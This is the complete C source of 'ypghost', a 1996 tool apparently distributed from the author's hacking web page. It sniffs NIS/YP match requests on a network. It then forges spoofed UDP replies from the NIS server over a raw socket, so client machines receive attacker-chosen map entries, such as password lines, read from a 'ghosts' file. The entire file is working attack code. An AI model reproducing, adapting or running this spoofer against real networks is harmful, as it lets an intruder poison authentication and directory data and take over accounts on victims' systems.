/************************************************************************/
/* ypghost050.c by Arny - cs6171@scitsc.wlv.ac.uk			*/
/* (c) copyright 1996 R.T.Arnold.  All rights reserved.  Permission is	*/
/* given for strictly non-profit personal educational use only.		*/
/* Ypghost is available free of charge from my WWW page at:		*/
/*		http://www.scit.wlv.ac.uk/~cs6171/hack/index.html	*/
/************************************************************************/
 
#include<sys/types.h>
#include<sys/socket.h>
#include<sys/stat.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<netdb.h>
#include<errno.h>
#include<stdio.h>
#include<stdlib.h>
#include<malloc.h>
#include<unistd.h>
#include<string.h>
#include<time.h>
#include<errno.h>
#include<signal.h>
#include<pcap.h>

#ifndef INADDR_NONE
#define INADDR_NONE	0xffffffff
#endif

#undef DEBUG
#undef DONTCONTACTPORTMAPPER
#undef LOOKINTERESTING

#define USAGE		"usage: %s [-O] [-i interface] [-s snaplength] [-f file] [-p serverport] server client\n"

#define MAXLINELENGTH	1024	/* as defined by YPMAXRECORD in yp.x	*/
#define MAXNAMELENGTH	64	/* as defined by YPMAXDOMAIN/YPMAXMAP "	*/
#define MAXIPSIZE	1500	/* should be at LEAST MAXLINELENGTH+63	*/

#define FILTLEN		1024	/* size of filter string buffer		*/
#define DEFAULTSNAP	512	/* in bytes, big means slow		*/
#define PROMISC		1	/* 1 means yes, 0 means no		*/
#define TIMEOUT		1024	/* in milliseconds			*/
#define FILTFORMAT	"dst host %s and src host %s and udp port %d"

#define DEFAULTFILE	"ghosts"
#define FIELDSEP	'%'
#define MAXENTRYS	1024
#define FILEWIDTH	(64+64+1024+1024)

#define MAXSENDS	8
#define	MAXRECVS	3
#define RECVWAIT	5

#define PADDING(x) (3-((x+3)%4))

void pcaptoip(u_char*,struct pcap_pkthdr*,const u_char*);

void mainbit(u_char*,int);
int badcall(u_char*);
int addghostentry(u_char*,u_char*,int);
int arncmp(char*,u_char*,u_long);
int ntstovaldat(char*,u_char*);
void theend(int);

u_short cptos(u_char*);
u_long cptol(u_char*);
u_char *scptocp(u_char*,u_char*);
u_char *lcptocp(u_char*,u_char*);
u_char *stocp(u_char*,u_short);
u_char *ltocp(u_char*,u_long);

void getghosts();
int stripnl(char*);
int fstonul(char*);
void freefnames(char**,int);

#ifndef DONTCONTACTPORTMAPPER
u_long getypport(u_char*);
void alarmhandler(int);
#endif


union shortunion
        {
        u_short s;
        u_char c[2];
        };

union longunion
        {
        u_long l;
        u_char c[4];
        };

struct ghostentry
	{
	char *domainname;
	char *mapname;
	char *keyname;
	char *line;
	};


u_char skel[MAXIPSIZE]=
	{
	0x45,	0,	0,	0,
	0,	0,	0,	0,
	0,	0x11,	0,	0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0,	0,	0x0,	0x0,
	0,	0,	0,	0,
	0,	0,	0,	0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x2,
	0x0,	0x1,	0x86,	0xa4,
	0x0,	0x0,	0x0,	0x02,
	0x0,	0x0,	0x0,	0x03,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0
	};

u_char gram[MAXIPSIZE]=
	{
	0x45,	0x00,	0,	0,
	0x00,	0x00,	0x00,	0x00,
	0xff,	0x11,	0x00,	0x00,
	0,	0,	0,	0,
	0,	0,	0,	0,
	0,	0,	0,	0,
	0,	0,	0x00,	0x00,
	0,	0,	0,	0,
	0x0,	0x0,	0x0,	0x1,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x1
	};


struct sockaddr sa;
int fd;

extern int optind;	/* needed for getopt(3), not quite sure why....	*/
extern char *optarg;	/*          ...these are not always in unistd.h	*/

/* you can delete the next line if you want, though on some systems 	*/
/* it wont compile if you do.  Does anybody know why?????????		*/

int fddipad;

pcap_t *pcd=NULL;
int offset;

char *filename=DEFAULTFILE;
struct ghostentry ghostentrys[MAXENTRYS];
int numofentrys;
char *gbuf;

int alarmed;

main(int argc,char **argv)
{
int i;
union longunion portnum;
struct sockaddr_in *p;
struct hostent *he;
u_long host;
char filt[FILTLEN];
char errbuf[PCAP_ERRBUF_SIZE];
char *interface=NULL;
int snaplength=DEFAULTSNAP;
int optimise=1;
u_long network,netmask;
struct bpf_program prog;

printf("\nypghost version 0.5 (c) copyright 1996 Arny - cs6171@scitsc.wlv.ac.uk\n\n");

if((sizeof(u_char)!=1)||(sizeof(u_short)!=2)||(sizeof(u_long)!=4))
	{
	fprintf(stderr,"error: u_char, u_short, or u_long aren't the right size!!!\n");
	exit(1);
	};

portnum.l=0xffffffff;

while((i=getopt(argc,argv,"Oi:s:f:p:"))!= -1)
	switch(i)
		{
		case 'O' :	optimise=0;
				break;
		case 'i' :	interface=optarg;
				break;
		case 's' :	snaplength=atoi(optarg);
				break;
		case 'f' :	filename=optarg;
				break;
		case 'p' :	portnum.l=htonl(atol(optarg));
				if(portnum.l==0xffffffff)
					{
					fprintf(stderr,"error: stupid portnumber specified\n");
					exit(1);
					};
				break;
		case '?' :	fprintf(stderr,USAGE,*argv);
				exit(1);
		default :	fprintf(stderr,"????? error processing command line arguments\n");
				exit(1);
		};

if((argc-optind)!=2)
	{
	fprintf(stderr,USAGE,*argv);
	exit(1);
	};

getghosts();

printf("%d ghost entrys read in from filename \"%s\"\n",numofentrys,filename);
if(numofentrys<=0) fprintf(stderr,"warning: number of ghost entrys=%d, are you sure this is OK?\n",numofentrys);

#ifdef DEBUG
for(i=0;i<numofentrys;i++)
	{
	printf("domainname=\t\"%s\"\n",ghostentrys[i].domainname);
	printf("mapname=\t\"%s\"\n",ghostentrys[i].mapname);
	printf("keyname=\t\"%s\"\n",ghostentrys[i].keyname);
	printf("line=\t\t\"%s\"\n\n",ghostentrys[i].line);
	};
#endif

p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;

if((host=inet_addr(argv[optind+1]))!=INADDR_NONE)
	{
	p->sin_addr.s_addr=host;
	ltocp(skel+12,host);
	ltocp(gram+16,host);
	}
else
	{
	if((he=gethostbyname(argv[optind+1]))==NULL)
		{
		fprintf(stderr,"error: can't resolve client hostname\n");
		exit(1);
		};
	if(he->h_addrtype!=AF_INET) fprintf(stderr,"resolved client address type is not AF_INET, will try to carry on anyway.\n");
	if(he->h_length!=4) fprintf(stderr,"resolved client address length is not 4, this is not good, will try to carry on.\n");
	bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
	bcopy(*(he->h_addr_list),(skel+12),4);
	bcopy(*(he->h_addr_list),(gram+16),4);
	};

if((host=inet_addr(argv[optind]))!=INADDR_NONE)
	{
	ltocp(skel+16,host);
	ltocp(gram+12,host);
	}
else
	{
	if((he=gethostbyname(argv[optind]))==NULL)
		{
		fprintf(stderr,"error: can't resolve server hostname\n");
		exit(1);
		};
	if(he->h_addrtype!=AF_INET) fprintf(stderr,"resolved server address type is not AF_INET, will try to carry on anyway.\n");
	if(he->h_length!=4) fprintf(stderr,"server address length is not 4, this is not good, will try to carry on anyway.\n");
	bcopy(*(he->h_addr_list),(skel+16),4);
	bcopy(*(he->h_addr_list),(gram+12),4);
	};

if(portnum.l==0xffffffff)
	{
#ifdef DONTCONTACTPORTMAPPER
fprintf(stderr,"error: this code has not been compiled to contact the portmapper, use -p\n");
exit(1);
#else
	if((portnum.l=getypport(skel+16))==0xffffffff)
		{
		fprintf(stderr,"error: unable to get port number from server, you could try the -p option\n");
		exit(1);
		};
	if(portnum.l==0)
		{
		fprintf(stderr,"error: YPPROG not registered with portmapper, use -p if you wish to ignore this\n");
		exit(1);
		};
#endif
	};
if(ntohl(portnum.l)&0xffff0000) fprintf(stderr,"warning: portnumber (%08lx) being truncated to 16 bits\n",ntohl(portnum.l));
scptocp(gram+20,scptocp(skel+22,(portnum.c)+2));

printf("client address=%08lx, server address=%08lx, server port=%04hx\n",ntohl(cptol(skel+12)),ntohl(cptol(skel+16)),ntohs(cptos(skel+22)));

/* test to see whether we will overrun buffer (this may not be perfect)	*/
if(printf(FILTFORMAT,argv[optind],argv[optind+1],ntohs(cptos(skel+22)))>=FILTLEN)
	{
	putchar('\n');
	fprintf(stderr,"error: filter string is too long\n");
	exit(1);
	};
putchar('\n');

sprintf(filt,FILTFORMAT,argv[optind],argv[optind+1],ntohs(cptos(skel+22)));

if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
	{
	perror("socket");
	exit(1);
	};

#ifdef IP_HDRINCL
i=1;
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&i,sizeof(i))<0)
	{
	perror("setsockopt IP_HDRINCL");
	exit(1);
        };
#else
fprintf(stderr,"the IP_HDRINCL option did not exist on the system this was compiled on\n");
#endif


/****************** libpcap stuff starts here ***************************/


if(interface==NULL) if((interface=pcap_lookupdev(errbuf))==NULL)
	{
	fprintf(stderr,"pcap_lookupdev: %s\n",errbuf);
	exit(1);
	};
if(pcap_lookupnet(interface,&network,&netmask,errbuf)== -1)
	{
	fprintf(stderr,"pcap_lookupnet: %s\n",errbuf);
	exit(1);
	};
printf("using interface %s, network=%08lx, netmask=%08lx, snaplength=%d\n",interface,ntohl(network),ntohl(netmask),snaplength);
if(!optimise) fprintf(stderr,"packet matching code optimiser turned off, do you suspect a bug in the code?\n");

if((pcd=pcap_open_live(interface,snaplength,PROMISC,TIMEOUT,errbuf))==NULL)
	{
	fprintf(stderr,"pcap_open_live: %s\n",errbuf);
	exit(1);
	};

/* one day, maybe one day, somebody will finish writing libpcap.
if(pcap_immediate(pcd)== -1)
	{
	pcap_perror(pcd,"pcap_compile");
	fprintf(stderr,"warning: immediate mode unavailable, this may affect performance\n");
	};
*/

switch(pcap_datalink(pcd))
	{
	case DLT_EN10MB :	offset=14;
				break;
	case DLT_NULL :		offset=0;
				break;
	default :		fprintf(stderr,"error: unsupported link layer type\n");
				exit(1);
	};

if(pcap_compile(pcd,&prog,filt,optimise,netmask)<0)
	{
	pcap_perror(pcd,"pcap_compile");
	exit(1);
	};
if(pcap_setfilter(pcd,&prog)<0)
	{
	pcap_perror(pcd,"pcap_setfilter");
	exit(1);
	};

if(signal(SIGINT,theend)==SIG_ERR) fprintf(stderr,"odd!  SIG_ERR returned by signal()\n");
if(signal(SIGTERM,theend)==SIG_ERR) fprintf(stderr,"odd!  SIG_ERR returned by signal()\n");

if(pcap_loop(pcd,0,(pcap_handler)pcaptoip,NULL)== -1)
	{
	pcap_perror(pcd,"pcap_loop");
	exit(1);
	};

fprintf(stderr,"odd!  pcap_loop has returned without an error?\n");
close(fd);
free(gbuf);
exit(1);
}


void pcaptoip(u_char *user,struct pcap_pkthdr* pchdr,const u_char *stuff)
{
#ifdef DEBUG
printf("captured length=%d  \treal length=%d\n",pchdr->caplen,pchdr->len);
#endif

/* libpcap lengths shouldn't be relied on.  Sure they may work fine on	*/
/* *YOUR* system.							*/

if(pchdr->caplen<pchdr->len)
	{
	putchar('T');
	return;
	};

mainbit((u_char*)stuff+offset,(pchdr->len)-offset);

#ifdef LOOKINTERESTING
fflush(stdout);
#endif
}


/****************** libpcap stuff ends here *****************************/


void mainbit(u_char *ippkt,int size)
{
int x,iplen,gramlen;

if(size<80)
	{
	putchar('S');
	return;
	};
if((iplen=(int)ntohs(cptos(ippkt+2)))<80)
	{
	putchar('s');
	return;
	};

#ifdef DEBUG
printf("snooped IP length=%d\n",iplen);
#endif

if(size<iplen)
	{
	putchar('t');
	return;
	};

if(badcall(ippkt))
	{
	putchar('b');
	return;
	};

scptocp(gram+22,ippkt+20);
lcptocp(gram+28,ippkt+28);

if((x=addghostentry(gram+56,ippkt+68,iplen-68))== -1)
	{
	putchar('#');
	return;
	};

stocp(gram+2,htons((u_short)(gramlen=60+x)));
stocp(gram+24,htons((u_short)(40+x)));

#ifdef DEBUG
printf("length of outgoing datagram=%d\n",gramlen);
#endif

/* the next line is paranoia, not too mention "shutting the stable door	*/
/* after the core has dumped".						*/
if((gramlen<60)||(gramlen>MAXIPSIZE))
	{
	fprintf(stderr,"\nMajor OOPS!! length of gram=%d\n",gramlen);
	fprintf(stderr,"This should never happen! :-(\n\n");
	return;
	};

if((sendto(fd,&gram,gramlen,0,&sa,sizeof(sa)))== -1)
	{
	perror("sendto");
	putchar('x');
	}
else putchar('!');

#ifdef DEBUG
printf("\n\nsnooped packet:\n");
for(x=0;x<size;x++)
	{
	if(!(x%4)) putchar('\n');
	printf("%02x",ippkt[x]);
	};
printf("\n\nsent datagram:\n");
for(x=0;x<gramlen;x++)
	{
	if(!(x%4)) putchar('\n');
	printf("%02x",gram[x]);
	};
putchar('\n');
#endif
}


int badcall(u_char* x)
{
register int c;
if(x[0]!=skel[0]) return(1);
if(x[9]!=skel[9]) return(1);
for(c=12;c<20;c++) if(x[c]!=skel[c]) return(1);
if(x[22]!=skel[22]) return(1);
if(x[23]!=skel[23]) return(1);
for(c=32;c<68;c++) if(x[c]!=skel[c]) return(1);
return(0);
}


int addghostentry(u_char *valdat,u_char *domainlen,int size)
{
static u_char *domain,*map,*key;
static u_char *maplen,*keylen;
static u_long dlen,mlen,klen;
static u_long a,b;

dlen=ntohl(cptol(domainlen));
if(dlen>MAXNAMELENGTH) return(-1);
domain=(((u_char*)domainlen)+4);
mlen=ntohl(cptol(maplen=(domain+(a=dlen+PADDING(dlen)))));
if(mlen>MAXNAMELENGTH) return(-1);
map=maplen+4;
klen=ntohl(cptol(keylen=(map+(b=mlen+PADDING(mlen)))));
if(klen>MAXLINELENGTH) return(-1);
key=keylen+4;
if(((int)(12+a+b+klen+PADDING(klen)))>size) return(-1);

#ifdef DEBUG
printf("dlen=%d, mlen=%d, klen=%d, total size=%d\n",dlen,mlen,klen,((int)(12+a+b+klen+PADDING(klen))));
#endif

for(a=0;a<numofentrys;a++)
	if(arncmp(ghostentrys[a].keyname,key,klen))
	if(arncmp(ghostentrys[a].mapname,map,mlen))
	if(arncmp(ghostentrys[a].domainname,domain,dlen))
	return(ntstovaldat(ghostentrys[a].line,valdat));
return(-1);
}


int arncmp(char *ntstring,u_char *xdrdata,u_long length)
{
register u_long c;
for(c=0;ntstring[c]!='\0';c++)
	{
	if(c>=length) return(0);
	if(ntstring[c]!=xdrdata[c]) return(0);
	};
if(c==length) return(1); else return(0);
}


int ntstovaldat(char *ntstring,u_char *od)
{
register u_long c;
static u_long e;
static u_char *d;
d=(od+4);
for(c=0;ntstring[c]!='\0';c++)
	{
	if(c>=MAXLINELENGTH) return(-1);
	d[c]=ntstring[c];
	};
ltocp(od,htonl(c));
for(e=c+PADDING(c);c<e;c++) d[c]=0;
return(e);
}


void theend(int sig)
{
struct pcap_stat pstat;
putchar('\n');
fflush(stdout);
fflush(stderr);
psignal(sig,"signal received");
if(pcd!=NULL)
	{
	if(pcap_stats(pcd,&pstat)) pcap_perror(pcd,"pcap_stats"); else
		printf("packets received=%d, packets dropped=%d\n",pstat.ps_recv,pstat.ps_drop);
	};
close(fd);
free(gbuf);
exit(0);
}


/******* here we have some functions to convert between types etc *******/


u_short cptos(u_char *cp)
{
static union shortunion s;
s.c[0]=cp[0];
s.c[1]=cp[1];
return(s.s);
}


u_long cptol(u_char *cp)
{
static union longunion l;
l.c[0]=cp[0];
l.c[1]=cp[1];
l.c[2]=cp[2];
l.c[3]=cp[3];
return(l.l);
}


u_char *scptocp(u_char *dest,u_char *src)
{
dest[0]=src[0];
dest[1]=src[1];
return(dest);
}


u_char *lcptocp(u_char *dest,u_char *src)
{
dest[0]=src[0];
dest[1]=src[1];
dest[2]=src[2];
dest[3]=src[3];
return(dest);
}


u_char *stocp(u_char *cp,u_short us)
{
static union shortunion s;
s.s=us;
cp[0]=s.c[0];
cp[1]=s.c[1];
return(cp);
}


u_char *ltocp(u_char *cp,u_long ul)
{
static union longunion l;
l.l=ul;
cp[0]=l.c[0];
cp[1]=l.c[1];
cp[2]=l.c[2];
cp[3]=l.c[3];
return(cp);
}


/******* the following code just reads filename into ghostentrys ********/


void getghosts()
{
int a=0,b=0;
int x,bufsize;
FILE *afp;
struct stat fs;

if(stat(filename,&fs))
	{
	perror("stat");
	fprintf(stderr,"error: can not get the file size of \"%s\"\n",filename);
	exit(1);
	};
#ifdef DEBUG
printf("size of \"%s\"=%d\n",filename,fs.st_size);
#endif

if((gbuf=(char*)malloc(bufsize=(fs.st_size+(2*FILEWIDTH))))==NULL)
	{
	perror("malloc");
	fprintf(stderr,"error: can not get memory\n");
	exit(1);
	};

if((afp=fopen(filename,"r"))==NULL)
	{
	perror("fopen");
	fprintf(stderr,"error: can not open file \"%s\"\n",filename);
	exit(1);
	};

numofentrys=0;
bufsize-=FILEWIDTH;

while(fgets((gbuf+a),FILEWIDTH,afp)!=NULL)
	{
	if(numofentrys>=MAXENTRYS)
		{
		fprintf(stderr,"error: too many entrys.  (if %d is really too few, change MAXENTRYS in source)\n",MAXENTRYS);
		exit(1);
		};

	ghostentrys[numofentrys].domainname=(gbuf+(b=a));
	if((x=fstonul(gbuf+b))== -1) continue;
	ghostentrys[numofentrys].mapname=(gbuf+(b+=(x+1)));
	if((x=fstonul(gbuf+b))== -1) continue;
	ghostentrys[numofentrys].keyname=(gbuf+(b+=(x+1)));
	if((x=fstonul(gbuf+b))== -1) continue;
	ghostentrys[numofentrys].line=(gbuf+(b+=(x+1)));
	a=(b+stripnl(gbuf+b)+1);

	if((a=(b+stripnl(gbuf+b)+1))>bufsize)
		{
		fprintf(stderr,"error: not enough memory allocated, is the file bigger than %d bytes?\n",fs.st_size);
		exit(1);
		};

	numofentrys++;
	};

fclose(afp);
}


int stripnl(char *s)
{
int c;
if(*s=='\0') return(0);
for(c=0;s[c]!='\0';c++);
if(s[c-1]=='\n') s[--c]='\0';
return(c);
}


int fstonul(char *s)
{
int c;
for(c=0;s[c]!='\0';c++) if(s[c]==FIELDSEP)
		{
		s[c]='\0';
		return(c);
		};
return(-1);
}


/********* the following code contacts the server's portmapper **********/


#ifndef DONTCONTACTPORTMAPPER

u_long getypport(u_char *server)
{
u_char getportcall[]=
	{
	0,	0,	0,	0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x2,
	0x0,	0x1,	0x86,	0xa0,
	0x0,	0x0,	0x0,	0x2,
	0x0,	0x0,	0x0,	0x3,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x1,	0x86,	0xa4,
	0x0,	0x0,	0x0,	0x2,
	0x0,	0x0,	0x0,	0x11,
	0x0,	0x0,	0x0,	0x0
	};
u_char getportskel[]=
	{
	0,	0,	0,	0,
	0x0,	0x0,	0x0,	0x1,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0,
	0x0,	0x0,	0x0,	0x0
	};
u_char recvbuf[MAXIPSIZE];
int i,a,b;
int udpsocket;
struct sockaddr_in to,from,fish;
int fishint=sizeof(fish);
union longunion l;

to.sin_family=AF_INET;
to.sin_port=htons(111);
bcopy(server,&(to.sin_addr),4);

from.sin_family=AF_INET;
from.sin_addr.s_addr=htonl(INADDR_ANY);

if((udpsocket=socket(AF_INET,SOCK_DGRAM,0x11))== -1)
	{
	perror("socket");
	return(0xffffffff);
	};

a=700+(time(NULL)&0x000000ff);
from.sin_port=htons(a);
for(b=1;bind(udpsocket,(struct sockaddr*)&from,sizeof(from));b++)
	{
#ifdef DEBUG
printf("bind to portnumber %d failed\n",ntohs(from.sin_port));
#endif
	if(errno!=EADDRINUSE)
		{
		perror("bind");
		close(udpsocket);
		return(0xffffffff);
		};
	if(b>255)
		{
		fprintf(stderr,"error: can not find a free port to bind to (between 700-955)\n");
		close(udpsocket);
		return(0xffffffff);
		};
	if((++a)>955) a=700;
	from.sin_port=htons(a);
	};

l.l=((u_long)getpid()*((u_long)0x12345678))+((u_long)time(NULL));

for(a=0;a<MAXSENDS;a++)
	{
/* its probably debateable whether XID should be changed between retrys	*/
	l.l++;
	getportskel[0]=getportcall[0]=l.c[0];
	getportskel[1]=getportcall[1]=l.c[1];
	getportskel[2]=getportcall[2]=l.c[2];
	getportskel[3]=getportcall[3]=l.c[3];

	printf("sending datagram to portmapper...\n");
	if(sendto(udpsocket,getportcall,sizeof(getportcall),0,(struct sockaddr*)&to,sizeof(to))== -1)
		{
		perror("sendto");
		close(udpsocket);
		return(0xffffffff);
		};

	printf("waiting for response...\n");
	for(b=0;b<MAXRECVS;b++)
		{
		if(signal(SIGALRM,alarmhandler)==SIG_ERR)
			{
			fprintf(stderr,"error: SIG_ERR returned by signal().  This is odd!\n");
			close(udpsocket);
			return(0xffffffff);
			};
		alarm(RECVWAIT);
		alarmed=0;
		if((i=recvfrom(udpsocket,recvbuf,sizeof(recvbuf),0,(struct sockaddr*)&fish,&fishint))== -1)
			{
			if((errno!=EINTR)||(!alarmed)) perror("recvfrom");
			alarm(0);
			if(signal(SIGALRM,SIG_DFL)==SIG_ERR) fprintf(stderr,"odd!  SIG_ERR returned by signal()\n");
			printf("still waiting for response...\n");
			continue;
			};
		alarm(0);
		if(signal(SIGALRM,SIG_DFL)==SIG_ERR) fprintf(stderr,"odd!  SIG_ERR returned by signal()\n");

		if(i<(sizeof(getportskel)+4))
			{
			printf("got *A* response, but its too short...\n");
			continue;
			};

		for(i=0;i<sizeof(getportskel);i++) if(getportskel[i]!=recvbuf[i])
			{
			printf("got *A* response, but byte[%d] is incorrect...\n",i);
			continue;
			};
		
		printf("success, got a valid response.\n");
		l.c[0]=recvbuf[i++];
		l.c[1]=recvbuf[i++];
		l.c[2]=recvbuf[i++];
		l.c[3]=recvbuf[i++];
		close(udpsocket);
		return(l.l);
		};
	};
close(udpsocket);
return(0xffffffff);
}

void alarmhandler(int sig)
{
alarmed=1;
}
#endif

